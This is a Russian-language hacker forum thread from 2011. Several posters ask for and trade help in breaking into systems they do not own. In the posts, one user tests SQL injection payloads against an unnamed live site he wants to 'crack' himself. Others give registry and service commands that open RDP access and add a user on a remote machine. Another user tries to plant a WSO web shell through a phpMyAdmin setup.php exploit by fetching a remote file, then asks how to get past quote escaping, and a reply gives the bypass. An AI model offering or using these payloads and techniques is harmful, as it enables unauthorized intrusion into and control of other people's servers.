17.09.2011, 20:48
|
|
Новичок
Регистрация: 09.09.2011
Сообщений: 12
С нами:
7723766
Репутация:
1
|
|
друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то:
Код:
DB Error: syntax error
SELECT login, password FROM emps WHERE login = '' or 1=1 --'
[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2]
а если 'admin' or "1"="1" /* то:
Код:
DB Error: unknown error
SELECT login, password FROM emps WHERE login = 'admin' or "1"="1" /*'
[nativecode=144 ** Table './tradtyru/emps' is marked as crashed and last (automatic?) repair failed]
Скажите, я все правильно делаю и все правильно кто-то уже сделал до меня, зарегав пользователя "; DROP TABLE", или я чего-то не учитываю?
P.S. не называю сайт, хочу сам расковырять, если возможно. |
|
|
17.09.2011, 21:28
|
|
Новичок
Регистрация: 12.08.2011
Сообщений: 18
С нами:
7764086
Репутация:
0
|
|
Сообщение от rad_scorp
Тебе нужно убедиться, что стандартный rdp порт для тебя будет открыт на фаере шлюза. Во-вторых, нужно добавить юзера, с которым заходишь, в группу remoteusers или как-то так. Ну и в-третьих, проще залить что-нибудь туда, что само даст мордочку, имхо, если есть возможность, конечно.
насчет юзера, это все ясно. Через батник он добавляется спокойно. А насчет мордочки, можешь ченить поконкретнее посоветовать?
|
|
|
|
17.09.2011, 22:10
|
|
Новичок
Регистрация: 09.09.2011
Сообщений: 12
С нами:
7723766
Репутация:
1
|
|
Сообщение от Ulitko
насчет юзера, это все ясно. Через батник он добавляется спокойно. А насчет мордочки, можешь ченить поконкретнее посоветовать?
Хм, что-то выдумать, кроме vnc, ничего не могу. Может, сообщество ау?
А начни проще, у тебя порт слушается? netstat?
|
|
|
|
17.09.2011, 22:18
|
|
Новичок
Регистрация: 12.08.2011
Сообщений: 18
С нами:
7764086
Репутация:
0
|
|
введя нетстат, выдало дохрена подключений.
|
|
|
|
17.09.2011, 22:55
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами:
9466141
Репутация:
74
|
|
Сообщение от None
дохрена подключений.
дохрена подключений по rdp?
ты уверен что служба рдп запущенна что бы ее открывать в фаерволе?
просто даже если добавил пользователя и октрыл для нее порт в фаерволе а служба не запущенна хрен что у тебя получится!
net start TermService
как то так вроде.
@rad_scorp
судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.
а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.
у тебя какая версия?
|
|
|
|
17.09.2011, 23:00
|
|
Новичок
Регистрация: 09.09.2011
Сообщений: 12
С нами:
7723766
Репутация:
1
|
|
Сообщение от Ulitko
введя нетстат, выдало дохрена подключений.
Хм. Да, не так все просто, как все сложно, но ман нетстата почитать неплохо бы.
Держи:
Код:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -a -n | findstr "3389"
Это разрешает соединения к терминальному серверу и затем удостоверяется, что сервис up and running. Это та самая галочка во вкладке свойств моего компьютера. В xp фаер вроде не мешает, если мешает - можно выключить. На 2008 (а значит, и, скорее всего, в 7) мы сталкивались с тем, что сервак увезли, а включить rdp забыли, и так просто туда не долезть. Тогда надо в реестре у фаера пару правил поправить, но сейчас не вспомню, если надо, в понедельник в личку пиши.
Если слушающего порта не появилось, то я не нашел, как ТС включить без перезагрузки. У меня net start "Terminal Services" не работает.
|
|
|
|
17.09.2011, 23:04
|
|
Новичок
Регистрация: 09.09.2011
Сообщений: 12
С нами:
7723766
Репутация:
1
|
|
Сообщение от xa-xa89
@rad_scorp
судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.
а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.
у тебя какая версия?
Не знаю, пока предположений нет. Попробовать union чтобы хоть какие-то версии отсечь? И такую ли ошибку выдает?
|
|
|
|
17.09.2011, 23:18
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
Сообщение от xa-xa89
дохрена подключений по rdp?
ты уверен что служба рдп запущенна что бы ее открывать в фаерволе?
просто даже если добавил пользователя и октрыл для нее порт в фаерволе а служба не запущенна хрен что у тебя получится!
net start TermService
как то так вроде.
@rad_scorp
судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.
а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.
у тебя какая версия?
просто помимо сайта, на компе стоит сервер одной MMORPG игры) Вот по этому и дохрена подключений)
|
|
|
|
18.09.2011, 01:23
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 0
С нами:
8515014
Репутация:
0
|
|
С помощью эксплойта через phpMyAdmin/scripts/setup.php
выводит phpinfo();
allow_url_fopen on
magic_quotes_gpc on
при попытке залить полноценный шелл с помощью такой конструкции
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wso.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://www.*********.com/wso/******.txt'[/COLOR][COLOR="#007700"]));[/COLOR][/COLOR]
одинарная кавычка экранируется обратным слешем \'
тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0
пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло
Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование
и залить полноценный шелл. |
|
|
|
18.09.2011, 02:05
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Sloneny
С помощью эксплойта через phpMyAdmin/scripts/setup.php
выводит
phpinfo();
allow_url_fopen on
magic_quotes_gpc on
при попытке залить полноценный шелл с помощью такой конструкции
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wso.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://www.*********.com/wso/******.txt'[/COLOR][COLOR="#007700"]));[/COLOR][/COLOR]
одинарная кавычка экранируется обратным слешем \'
тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0
пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло
Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование
и залить полноценный шелл. просто stripslashes делай
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
